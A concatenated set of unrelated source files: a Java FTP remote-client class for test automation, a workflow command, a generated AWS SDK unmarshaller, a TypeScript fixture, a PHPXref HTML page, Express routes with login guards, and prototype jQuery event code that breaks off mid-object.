    private Prompt[] ftpLoginPrompts;      // prompts meaning "server awaits user name"
    private Prompt[] ftpPasswordPrompts;   // prompts meaning "server awaits password"
    private java.net.InetAddress localMachine;
    private boolean promptOn = true;       // mget/mput interactive-prompt mode

    /**
     * Constructs a FTPRemoteClient whose CLI connectivity is taken from the
     * given {@link CliConnection}; other connectivity members are ignored.
     */
    public FTPRemoteClient(CliConnection cliConn, String ftpServerHostName) throws Exception {
        cliConnection = cliConn;
        setFtpServerHostName(ftpServerHostName);
    }

    /**
     * Constructs a FTPRemoteClient for working on local machine as the remote machine.<br>
     * Used for testing purposes.
     */
    public FTPRemoteClient() throws Exception {
        localMachine = java.net.InetAddress.getLocalHost();
        setHost(localMachine.getHostName());
    }

    /**
     * Constructs a FTPRemoteClient were remote machine is this machine.
     * The FTPRemoteClient assumes Aqua's embedded FTP server is running on
     * this machine.
     */
    public FTPRemoteClient(String user, String password) throws Exception {
        this();
        setUser(user);
        setPassword(password);
    }

    /**
     * Constructs a FTPRemoteClient were remote machine is <code>host</code>.
     * The FTPRemoteClient assumes Aqua's embedded FTP server is running on
     * this machine.
     */
    public FTPRemoteClient(String host, String telnetUser, String telnetPassword, String ftpServerHostName) throws Exception {
        this(telnetUser, telnetPassword);
        setHost(host);
        setFtpServerHostName(ftpServerHostName);
    }

    /**
     * Initializes {@link FTPRemoteClient} members and verifies that
     * a telnet connection can be opened to the remote client and
     * that the remote client can open a FTP connection to the server.<br>
     * All connections are closed when initialization is done.
     * @see SystemObjectImpl#init()
     */
    public void init() throws Exception {
        super.init();
        initPrompts();
    }

    /**
     * Closes connection to remote machine (FTP client first, then the CLI session).
     */
    public void closeFTPSession() {
        closeFtp();
        closeCli();
    }

    /**
     * Copies a file from FTP server machine(in most cases it will be the local machine)
     * to the remote client.<br>
     * Source file path should be relative to FTP user home directory and not absolute
     * file path.
     * Destination can be either absolute destination path or relative to client's
     * user directory.<br>
     */
    public void copyFileFromLocalMachineToRemoteClient(String source, String destination) throws Exception {
        // Issues an FTP "get <source> <destination>" on the remote client.
        StringBuffer stringbuffer = new StringBuffer("get ");
        destination = adjustPath(destination);
        stringbuffer.append(source);
        stringbuffer.append(" ");
        stringbuffer.append(destination);
        copyFileViaFTP(stringbuffer.toString());
    }

    /**
     * Copies all files from FTP server machine(in most cases it will be the local machine)
     * to the remote client.<br>
     *
     * @param filesPath - String Array (String...) of full file path.<br>
     * @throws Exception
     */
    public void copyAllFilesFromLocalMachineToLocalRemote(String... filesPath) throws Exception {
        copyAllFilesViaFTP("mget ", filesPath);
    }

    /**
     * Copies a file from the remote client to FTP server machine(in most cases it will be
     * the local machine)
     *
     * Source file path can be either absolute destination path or relative to client's
     * user directory.
     * Destination should be relative to FTP user home directory and not absolute
     * file path.
     */
    public void copyFileFromRemoteClientToLocalMachine(String source, String destination) throws Exception {
        // Issues an FTP "put <source> <destination>" on the remote client.
        source = adjustPath(source);
        StringBuffer stringbuffer = new StringBuffer("put ");
        stringbuffer.append(source);
        stringbuffer.append(" ");
        stringbuffer.append(destination);
        copyFileViaFTP(stringbuffer.toString());
    }

    /**
     * Copies all files from remote client to FTP server machine(in most cases it will be
     * the local machine).<br>
     *
     * @param filesPath - String Array (String...) of full file path.<br>
     * @throws Exception
     */
    public void copyAllFilesFromRemoteMachineToLocalMachine(String... filesPath) throws Exception {
        copyAllFilesViaFTP("mput ", filesPath);
    }

    // Opens the session (if needed), applies transfer/prompt modes, runs one command.
    private void copyFileViaFTP(String command) throws Exception {
        openFTPSession();
        setAsciiMode(isAscii());
        setPromptMode(isPromptOn());
        runCliCommand(command);
    }

    // Same as copyFileViaFTP but appends every adjusted path to a single m{get,put} command.
    private void copyAllFilesViaFTP(String command, String... filesPath) throws Exception {
        StringBuffer stringBuffer = new StringBuffer(command);
        openFTPSession();
        setAsciiMode(isAscii());
        setPromptMode(isPromptOn());
        for (String currentFilePath : filesPath) {
            String source = adjustPath(currentFilePath);
            stringBuffer.append(source);
            stringBuffer.append(" ");
        }
        runCliCommand(stringBuffer.toString());
    }

    // Runs a transfer command (5 min timeout) and checks for FTP code 226
    // ("transfer complete") in the captured output.
    private void runCliCommand(String command) throws Exception {
        cli.command(command, 1000 * 60 * 5, true, false, null, ftpGeneralPrompts);
        if (cli.getResult().indexOf("226") < 0) {
            throw new Exception("Failed in files transfer");
        }
    }

    /**
     * Changes ftp session mode to passive.
     * The "passive" command toggles the mode, so it is sent up to twice until the
     * reported state ("on"/"off") matches the requested one.
     */
    public void passivate(boolean isPassive) throws Exception {
        openFTPSession();
        for (int i = 0; i < 2; i++) {
            cli.command("passive", 1000 * 60, true, false, null, ftpGeneralPrompts);
            String result = cli.getResult().toLowerCase();
            boolean on = result.indexOf("on") >= 0;
            boolean off = result.indexOf("off") >= 0;
            boolean notSupported = result.indexOf("invalid") >= 0;
            if (notSupported) {
                throw new Exception("Passivation not supported");
            }
            if ((isPassive && on) || (!isPassive && off)) {
                break;
            }
        }
    }

    /**
     * Terminates FTPRemoteClient.
     */
    public void close() {
        closeFTPSession();
        super.close();
    }

    /**
     * Opens FTP session (lazily creates the CLI session, then logs in).
     */
    private void openFTPSession() throws Exception {
        initCli();
        ftpLogin();
    }

    /**
     * Creates the CLI session if one is not already open; prefers the
     * user-supplied {@link #cliConnection} over ad-hoc connectivity members.
     */
    private void initCli() throws Exception {
        if (cli == null) {
            if (cliConnection != null) {
                initCliFromCliConnectionImpl();
                return;
            }
            Prompt p = new Prompt();
            p.setPrompt(">");
            p.setCommandEnd(true);
            cli = CliFactory.createCli(getHost(), getOperatingSystem(), getProtocol(), getUser(), getPassword(), new Prompt[]{p});
        }
    }

    // Connects cliConnection if needed and extracts its private "cli" field
    // by reflection (CliConnectionImpl does not expose it).
    private void initCliFromCliConnectionImpl() throws Exception {
        if (!cliConnection.isConnected()) {
            cliConnection.connect();
        }
        cli = (Cli) ReflectionUtils.getField("cli", CliConnectionImpl.class).get(cliConnection);
    }

    // Sends "bye" and checks for FTP code 221 ("goodbye"); failures are only
    // reported, never thrown — closing is best-effort.
    private void closeFtp() {
        try {
            cli.command("bye", 1000 * 2, true, false, null, new Prompt[]{new Prompt("bye.", true)});
            if (cli.getResult().indexOf("221") < 0) {
                report.report("Did not find success code 221");
            }
        } catch (Exception e) {
            report.report("Could not find prompt after closing session. " + e.getMessage());
        }
    }

    // Closes the CLI session (and the underlying CliConnection when used);
    // always nulls `cli` so the next operation reopens it.
    private void closeCli() {
        if (cli != null) {
            try {
                if (cliConnection != null) {
                    closeCliConnectionImpl();
                }
                cli.close();
            } catch (Exception e) {
                report.report("Failed closing telnet connection", e);
            }
        }
        cli = null;
    }

    private void closeCliConnectionImpl() throws Exception {
        if (cliConnection.isConnected()) {
            cliConnection.disconnect();
        }
    }

    /**
     * Starts FTP client and performs login.
     * Checks FTP reply codes at each step: 220 (server ready), 331 (user ok,
     * need password), 230 (logged in).
     */
    private void ftpLogin() throws Exception {
        // An empty command probes the current prompt to detect an open session.
        cli.command("");
        String result = cli.getResult();
        for (String ftpPrompt : promptsToStringArray(ftpGeneralPrompts)) {
            if (result.indexOf(ftpPrompt) >= 0) {
                //we are already logged in
                return;
            }
        }
        String serverAddress = getFTPServerAddress();
        cli.command("ftp " + serverAddress, 1000 * 60, true, false, null, ftpLoginPrompts);
        if (cli.getResult().indexOf("220") < 0) {
            throw new Exception("Failed connecting to FTP server.(" + serverAddress + "). Please verify that there is a ping between the remote client to the runner machine");
        }
        cli.command(getFtpUserName(), 1000 * 60, true, false, null, ftpPasswordPrompts);
        if (cli.getResult().indexOf("331") < 0) {
            throw new Exception("Failed in login process");
        }
        cli.command(getFtpPassword(), 1000 * 60, true, false, null, ftpGeneralPrompts);
        if (cli.getResult().indexOf("230") < 0) {
            throw new Exception("User not authorized to login");
        }
    }

    /**
     * Changes ftp session mode (ascii/binary); expects FTP code 200.
     */
    private void setAsciiMode(boolean isAscii) throws Exception {
        String command = "binary";
        if (isAscii) {
            command = "ascii";
        }
        cli.command(command, 1000 * 60, true, false, null, ftpGeneralPrompts);
        if (cli.getResult().indexOf("200") < 0) {
            throw new Exception("Failed changing to binary mode");
        }
    }

    /**
     * Changes the FTP session interactive-prompt mode ( on / off ).
     * The client echoes "Interactive mode ..." on success.
     * @param promptOn
     * @throws Exception
     */
    private void setPromptMode(boolean promptOn) throws Exception {
        String command = "prompt off";
        if (promptOn) {
            command = "prompt on";
        }
        cli.command(command, 1000 * 60, true, false, null, ftpGeneralPrompts);
        if (cli.getResult().indexOf("Interactive") < 0) {
            throw new Exception("Failed changing prompt mode");
        }
    }

    public boolean isPromptOn() {
        return promptOn;
    }

    public void setPromptOn(boolean promptOn) {
        this.promptOn = promptOn;
    }

    /**
     * Adjusts file path to operating system.
     * Windows paths are converted and quoted (to survive embedded spaces);
     * otherwise separators are normalized to '/'.
     */
    private String adjustPath(String path) {
        if (CliFactory.OPERATING_SYSTEM_WINDOWS.equals(getOperatingSystem())) {
            String toReturn = FileUtils.convertToWindowsPath(path);
            if (!toReturn.startsWith("\"")) {
                toReturn = "\"" + toReturn + "\"";
            }
            return toReturn;
        } else {
            return FileUtils.replaceSeparator(path);
        }
    }

    /**
     * Builds the three prompt arrays, merging built-in defaults with any
     * user additions from {@link #FILE_TRANSFER_PROPERTIES_FILE_NAME}.
     */
    private void initPrompts() throws Exception {
        String[] defaultFTPPrompts = new String[]{"ftp>"};
        String[] defaultLoginPrompts = new String[]{"):"};
        String[] defaultPasswordPrompts = new String[]{"for " + getFtpUserName(), "Password:"};
        if (!new File(FILE_TRANSFER_PROPERTIES_FILE_NAME).exists()) {
            // No override file: use defaults only.
            ftpGeneralPrompts = stringArrayToPrompts(defaultFTPPrompts);
            ftpLoginPrompts = stringArrayToPrompts(defaultLoginPrompts);
            ftpPasswordPrompts = stringArrayToPrompts(defaultPasswordPrompts);
            return;
        }
        Properties props = new Properties();
        FileInputStream stream = new FileInputStream(FILE_TRANSFER_PROPERTIES_FILE_NAME);
        try {
            props.load(stream);
        } finally {
            try { stream.close(); } catch (Exception e) {};
        }
        String ftpPrompts = props.getProperty(FTP_PROMPTS);
        String[] ftpPromptsAsStringArray = StringUtils.split(ftpPrompts, ";, ");
        ftpPromptsAsStringArray = StringUtils.mergeStringArrays(new String[][]{ftpPromptsAsStringArray, defaultFTPPrompts});
        ftpGeneralPrompts = stringArrayToPrompts(ftpPromptsAsStringArray);

        String _ftpLoginPrompts = props.getProperty(FTP_LOGIN_PROMPTS);
        String[] ftpLoginPromptsAsStringArray = StringUtils.split(_ftpLoginPrompts, ";, ");
        ftpLoginPromptsAsStringArray = StringUtils.mergeStringArrays(new String[][]{ftpLoginPromptsAsStringArray, defaultLoginPrompts});
        ftpLoginPrompts = stringArrayToPrompts(ftpLoginPromptsAsStringArray);

        String _ftpPasswordPrompts = props.getProperty(FTP_PASSWORD_PROMPTS);
        String[] ftpPasswordPromptsAsStringArray = StringUtils.split(_ftpPasswordPrompts, ";, ");
        ftpPasswordPromptsAsStringArray = StringUtils.mergeStringArrays(new String[][]{ftpPasswordPromptsAsStringArray, defaultPasswordPrompts});
        ftpPasswordPrompts = stringArrayToPrompts(ftpPasswordPromptsAsStringArray);
    }

    // Extracts the raw prompt strings from an array of Prompt objects.
    private String[] promptsToStringArray(Prompt[] prompts) {
        if (prompts == null) {
            return new String[0];
        }
        String[] res = new String[prompts.length];
        int i = 0;
        for (Prompt p : prompts) {
            res[i] = p.getPrompt();
            i++;
        }
        return res;
    }

    // Wraps raw prompt strings as non-regex, command-terminating Prompts.
    private Prompt[] stringArrayToPrompts(String[] promptsAsString) {
        if (promptsAsString == null) {
            return new Prompt[0];
        }
        Prompt[] res = new Prompt[promptsAsString.length];
        int i = 0;
        for (String s : promptsAsString) {
            res[i] = new Prompt(s, false);
            res[i].setCommandEnd(true);
            i++;
        }
        return res;
    }

    // Resolves the FTP server address: explicit member, then jsystem.properties
    // override, then the local machine host name (see class doc).
    private String getFTPServerAddress() {
        if (!StringUtils.isEmpty(getFtpServerHostName())) {
            return getFtpServerHostName();
        }
        if (!StringUtils.isEmpty(JSystemProperties.getInstance().getPreference(LOCAL_HOST_ADDRESS_PROPERTY))) {
            return JSystemProperties.getInstance().getPreference(LOCAL_HOST_ADDRESS_PROPERTY);
        }
        return localMachine.getHostName();
    }

    /**********************************************************************
     * FTPRemoteClient setters and getters
     *********************************************************************/
    public String getHost() {
        return host;
    }

    public String getOperatingSystem() {
        return operatingSystem;
    }

    public void setOperatingSystem(String operatingSystem) {
        this.operatingSystem = operatingSystem;
    }

    public String getProtocol() {
        return protocol;
    }

    public void setProtocol(String protocol) {
        this.protocol = protocol;
    }

    public void setHost(String remoteHost) {
        this.host = remoteHost;
    }

    public String getPassword() {
        return password;
    }

    public void setPassword(String telnetPassword) {
        this.password = telnetPassword;
    }

    public int getPort() {
        return port;
    }

    public void setPort(int telnetPort) {
        this.port = telnetPort;
    }

    public String getUser() {
        return user;
    }

    public void setUser(String telnetUser) {
        this.user = telnetUser;
    }

    public String getFtpServerHostName() {
        return ftpServerHostName;
    }

    public void setFtpServerHostName(String ftpServerHostName) {
        this.ftpServerHostName = ftpServerHostName;
    }

    public String getFtpUserName() {
        return ftpUserName;
    }

    public void setFtpUserName(String ftpUserName) {
        this.ftpUserName = ftpUserName;
    }

    public String getFtpPassword() {
        return ftpPassword;
    }

    public void setFtpPassword(String ftpPassword) {
        this.ftpPassword = ftpPassword;
    }

    public boolean isAscii() {
        return ascii;
    }

    public void setAscii(boolean ascii) {
        this.ascii = ascii;
    }
}
Java
/******************************************************************************* * Copyright 2017 Bstek * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy * of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. ******************************************************************************/ package com.bstek.uflo.command.impl; import java.util.List; import org.hibernate.criterion.Order; import org.hibernate.criterion.Restrictions; import com.bstek.uflo.command.Command; import com.bstek.uflo.env.Context; import com.bstek.uflo.model.HistoryTask; /** * @author Jacky.gao * @since 2013年9月12日 */ public class GetListHistoryTasksCommand implements Command<List<HistoryTask>> { private long processInstanceId; public GetListHistoryTasksCommand(long processInstanceId) { this.processInstanceId = processInstanceId; } @SuppressWarnings("unchecked") public List<HistoryTask> execute(Context context) { return context.getSession().createCriteria(HistoryTask.class) .add(Restrictions.eq("processInstanceId", processInstanceId)) .addOrder(Order.desc("endDate")).list(); } }
Java
/*
 * Copyright 2012-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
 * the License. A copy of the License is located at
 *
 * http://aws.amazon.com/apache2.0
 *
 * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
 * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
 * and limitations under the License.
 */
package com.amazonaws.services.elasticmapreduce.model.transform;

import java.math.*;

import javax.annotation.Generated;

import com.amazonaws.services.elasticmapreduce.model.*;
import com.amazonaws.transform.SimpleTypeJsonUnmarshallers.*;
import com.amazonaws.transform.*;

import com.fasterxml.jackson.core.JsonToken;
import static com.fasterxml.jackson.core.JsonToken.*;

/**
 * DescribeClusterResult JSON Unmarshaller
 *
 * Generated code: walks the JSON token stream and populates a
 * {@link DescribeClusterResult} from the "Cluster" member. Do not edit by
 * hand — regenerate via the AWS SDK code generator.
 */
@Generated("com.amazonaws:aws-java-sdk-code-generator")
public class DescribeClusterResultJsonUnmarshaller implements Unmarshaller<DescribeClusterResult, JsonUnmarshallerContext> {

    public DescribeClusterResult unmarshall(JsonUnmarshallerContext context) throws Exception {
        DescribeClusterResult describeClusterResult = new DescribeClusterResult();

        // Members of this result live exactly one level below the current depth.
        int originalDepth = context.getCurrentDepth();
        String currentParentElement = context.getCurrentParentElement();
        int targetDepth = originalDepth + 1;

        JsonToken token = context.getCurrentToken();
        if (token == null)
            token = context.nextToken();
        // A JSON null for the whole result yields an empty result object.
        if (token == VALUE_NULL) {
            return describeClusterResult;
        }

        while (true) {
            if (token == null)
                break;

            if (token == FIELD_NAME || token == START_OBJECT) {
                // Delegate the nested "Cluster" object to its own unmarshaller.
                if (context.testExpression("Cluster", targetDepth)) {
                    context.nextToken();
                    describeClusterResult.setCluster(ClusterJsonUnmarshaller.getInstance().unmarshall(context));
                }
            } else if (token == END_ARRAY || token == END_OBJECT) {
                // Stop once we close back out to (or above) the depth we started at.
                if (context.getLastParsedParentElement() == null || context.getLastParsedParentElement().equals(currentParentElement)) {
                    if (context.getCurrentDepth() <= originalDepth)
                        break;
                }
            }
            token = context.nextToken();
        }

        return describeClusterResult;
    }

    private static DescribeClusterResultJsonUnmarshaller instance;

    // Lazily-created shared instance; the unmarshaller itself is stateless.
    public static DescribeClusterResultJsonUnmarshaller getInstance() {
        if (instance == null)
            instance = new DescribeClusterResultJsonUnmarshaller();
        return instance;
    }
}
Java
// @target: ES6
// Appears to be a compiler conformance fixture: exercises the remainder
// operator with a template-literal right-hand operand.
var x = 1 % `abc${ 1 }def`;
Java
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Class Reference: testofauthenticator</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-print.css" type="text/css" media="print"> <style id="hilight" type="text/css"></style> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> </head> <body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff"> <table class="pagetitle" width="100%"> <tr> <td valign="top" class="pagetitle"> [ <a href="../index.html">Index</a> ] </td> <td align="right" class="pagetitle"> <h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2> </td> </tr> </table> <!-- Generated by PHPXref 0.7.1 at Thu Oct 23 18:57:41 2014 --> <!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net --> <!-- http://phpxref.sourceforge.net/ --> <script src="../phpxref.js" type="text/javascript"></script> <script language="JavaScript" type="text/javascript"> <!-- ext='.html'; relbase='../'; subdir='_classes'; filename='index.html'; cookiekey='phpxref'; handleNavFrame(relbase, subdir, filename); logClass('testofauthenticator'); // --> </script> <script language="JavaScript" type="text/javascript"> if (gwGetCookie('xrefnav')=='off') document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>'); else document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>'); </script> <noscript> <p class="navlinks"> [ <a href="../nav.html" target="_top">Show Explorer</a> ] [ <a href="index.html" target="_top">Hide Navbar</a> ] </p> </noscript> [<a href="../index.html">Top level directory</a>]<br> <script language="JavaScript" type="text/javascript"> <!-- document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" 
onMouseOver="showSearchBox()">Search</a><br>'); document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">'); document.writeln('<tr><td class="searchbox-title">'); document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>'); document.writeln('<\/td><\/tr>'); document.writeln('<tr><td class="searchbox-body" id="searchbox-body">'); document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>'); document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: '); document.writeln('<input type="text" size=10 value="" name="classname"><br>'); document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: '); document.writeln('<input type="text" size=10 value="" name="funcname"><br>'); document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: '); document.writeln('<input type="text" size=10 value="" name="varname"><br>'); document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: '); document.writeln('<input type="text" size=10 value="" name="constname"><br>'); document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: '); document.writeln('<input type="text" size=10 value="" name="tablename"><br>'); document.writeln('<input type="submit" class="searchbox-button" value="Search">'); document.writeln('<\/form>'); document.writeln('<\/td><\/tr><\/table>'); document.writeln('<\/td><\/tr><\/table>'); // --> </script> <div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div> <h3>Class Cross Reference</h3> <h2><a href="index.html#testofauthenticator">testofauthenticator</a></h2> <b>Defined at:</b><ul> 
<li><a href="../tests/simpletest/test/authentication_test.php.html#testofauthenticator">/tests/simpletest/test/authentication_test.php</a> -> <a onClick="logClass('testofauthenticator', '/tests/simpletest/test/authentication_test.php.source.html#l89')" href="../tests/simpletest/test/authentication_test.php.source.html#l89"> line 89</a></li> </ul> <br><b>No references found.</b><br><br> </ul> <!-- A link to the phpxref site in your customized footer file is appreciated ;-) --> <br><hr> <table width="100%"> <tr><td>Generated: Thu Oct 23 18:57:41 2014</td> <td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td> </tr> </table> </body></html>
Java
/**
 * App routes.
 *
 * Wires all HTTP routes onto the Express app and defines the three
 * auth-guard middlewares used by protected routes. Unauthenticated or
 * unauthorized requests are flashed an error and redirected to the
 * sign-in page with a `redirect` query back to the original path.
 */

var homepage = require('./homepage');
var user = require('./user');
var news = require('./news');
var test = require('./test');
var passport = require('passport');

// Guard: any logged-in user may pass.
function ensureAuthenticated(req, res, next) {
  if (req.isAuthenticated()) { return next(); }
  req.flash('error', '抱歉,您尚未登录。');
  return res.redirect('/user/signin?redirect=' + req.path);
}

// Guard: only admins may pass.
function ensureAdmin(req, res, next) {
  if (req.isAuthenticated() && req.user.isadmin) { return next(); }
  req.flash('error', '抱歉,您不是管理员。');
  return res.redirect('/user/signin?redirect=' + req.path);
}

// Guard: admins, or the user whose own :id matches the session user.
// NOTE(review): loose == lets a numeric username match the string route
// param — presumably intentional; confirm username's stored type.
function ensurePermission(req, res, next) {
  if (req.isAuthenticated() && req.user.isadmin) { return next(); }
  if (req.isAuthenticated() && req.user.username == req.params.id) { return next(); }
  req.flash('error', '抱歉,您没有权限。');
  return res.redirect('/user/signin?redirect=' + req.path);
}

module.exports = function(app) {
  app.get('/', homepage.index);

  // User management. :id is constrained to 8-13 digits (phone-number ids).
  app.get('/user', ensureAdmin, user.showList);
  app.get('/user/page/:page(\\d+)', ensureAdmin, user.showList);
  app.get('/user/register', user.showRegister);
  app.post('/user/register', user.doRegister);
  app.get('/user/signin', user.showSignin);
  app.post('/user/signin', passport.authenticate('local', {
    successRedirect: '/',
    successFlash: '登录成功,欢迎回来。',
    failureRedirect: 'back',
    failureFlash: '抱歉,手机号或密码错误。',
  }));
  app.get('/user/signout', user.doSignout);
  app.get('/user/:id(\\d{8,13})/edit', ensurePermission, user.showEditUser);
  app.post('/user/:id(\\d{8,13})/edit', ensurePermission, user.doEditUser);
  app.get('/user/:id(\\d{8,13})/setadmin', ensureAdmin, user.setAdmin);

  // News. Listing/viewing is public; editing/posting is admin-only.
  // '/news/post' cannot collide with '/news/:id' since :id requires digits.
  app.get('/news', news.showList);
  app.get('/news/page/:page(\\d+)', news.showList);
  app.get('/news/:id(\\d+)', news.showItem);
  app.get('/news/:id(\\d+)/edit', ensureAdmin, news.showEditItem);
  app.post('/news/:id(\\d+)/edit', ensureAdmin, news.doEditItem);
  app.get('/news/:id(\\d+)/delete', ensureAdmin, news.doDeleteItem);
  app.get('/news/post', ensureAdmin, news.showNewItem);
  app.post('/news/post', ensureAdmin, news.doNewItem);

  app.get('/test', test);

  // Catch-all: render the homepage template with a 404 title.
  app.get('*', function(req, res){
    return res.render('homepage', {title: '404'});
  });
}
Java
jQuery("#simulation") .on("click", ".s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d .click", function(event, data) { var jEvent, jFirer, cases; if(data === undefined) { data = event; } jEvent = jimEvent(event); jFirer = jEvent.getEventFirer(); if(jFirer.is("#s-Label_58")) { cases = [ { "blocks": [ { "actions": [ { "action": "jimChangeStyle", "parameter": [ { "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58": { "attributes": { "font-size": "12.0pt", "font-family": "Roboto-Regular,Arial" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58 .valign": { "attributes": { "vertical-align": "middle", "text-align": "left" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58 span": { "attributes": { "color": "#80B8F1", "text-align": "left", "text-decoration": "none", "font-family": "Roboto-Regular,Arial", "font-size": "12.0pt" } } } ], "exectype": "serial", "delay": 0 }, { "action": "jimChangeStyle", "parameter": [ { "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59": { "attributes": { "font-size": "20.0pt", "font-family": "IOS8-Icons-Regular,Arial" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59 .valign": { "attributes": { "vertical-align": "middle", "text-align": "left" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59 span": { "attributes": { "color": "#80B8F1", "text-align": "left", "text-decoration": "none", "font-family": "IOS8-Icons-Regular,Arial", "font-size": "20.0pt" } } } ], "exectype": "serial", "delay": 0 }, { "action": "jimPause", "parameter": { "pause": 300 }, "exectype": "serial", "delay": 0 }, { "action": "jimChangeStyle", "parameter": [ { "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58": { "attributes": { "font-size": "12.0pt", "font-family": "Roboto-Regular,Arial" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58 .valign": { "attributes": { "vertical-align": "middle", "text-align": "left" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58 span": { "attributes": { "color": "#007DFF", 
"text-align": "left", "text-decoration": "none", "font-family": "Roboto-Regular,Arial", "font-size": "12.0pt" } } } ], "exectype": "serial", "delay": 0 }, { "action": "jimChangeStyle", "parameter": [ { "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59": { "attributes": { "font-size": "20.0pt", "font-family": "IOS8-Icons-Regular,Arial" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59 .valign": { "attributes": { "vertical-align": "middle", "text-align": "left" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59 span": { "attributes": { "color": "#157EFB", "text-align": "left", "text-decoration": "none", "font-family": "IOS8-Icons-Regular,Arial", "font-size": "20.0pt" } } } ], "exectype": "serial", "delay": 0 } ] } ], "exectype": "serial", "delay": 0 } ]; event.data = data; jEvent.launchCases(cases); } else if(jFirer.is("#s-cover")) { cases = [ { "blocks": [ { "actions": [ { "action": "jimChangeStyle", "parameter": [ { "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": { "attributes": { "opacity": "0.75" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": { "attributes-ie": { "-ms-filter": "progid:DXImageTransform.Microsoft.Alpha(Opacity=75)", "filter": "alpha(opacity=75)" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": { "attributes-ie8lte": { "-ms-filter": "progid:DXImageTransform.Microsoft.Alpha(Opacity=75)", "filter": "alpha(opacity=75)" } } } ], "exectype": "serial", "delay": 0 }, { "action": "jimPause", "parameter": { "pause": 300 }, "exectype": "serial", "delay": 0 }, { "action": "jimChangeStyle", "parameter": [ { "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": { "attributes": { "opacity": "1.0" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": { "attributes-ie": { "-ms-filter": "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)", "filter": "alpha(opacity=100)" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": { "attributes-ie8lte": { "-ms-filter": 
"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)", "filter": "alpha(opacity=100)" } } } ], "exectype": "serial", "delay": 0 } ] } ], "exectype": "serial", "delay": 0 } ]; event.data = data; jEvent.launchCases(cases); } else if(jFirer.is("#s-Hotspot_1")) { cases = [ { "blocks": [ { "actions": [ { "action": "jimNavigation", "parameter": { "target": "screens/6709a53d-60b3-4498-bf73-977706fff4da" }, "exectype": "serial", "delay": 0 } ] } ], "exectype": "serial", "delay": 0 } ]; event.data = data; jEvent.launchCases(cases); } else if(jFirer.is("#s-Hotspot_3")) { cases = [ { "blocks": [ { "actions": [ { "action": "jimNavigation", "parameter": { "target": "screens/27852e19-fc20-4cac-8d96-13d00ac70f75" }, "exectype": "serial", "delay": 0 } ] } ], "exectype": "serial", "delay": 0 } ]; event.data = data; jEvent.launchCases(cases); } else if(jFirer.is("#s-Button_1")) { cases = [ { "blocks": [ { "actions": [ { "action": "jimChangeStyle", "parameter": [ { "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1": { "attributes": { "font-size": "12.0pt", "font-family": "Roboto-Regular,Arial" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1 .valign": { "attributes": { "vertical-align": "middle", "text-align": "center" } } },{ "#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1 span": { "attributes": { "color": 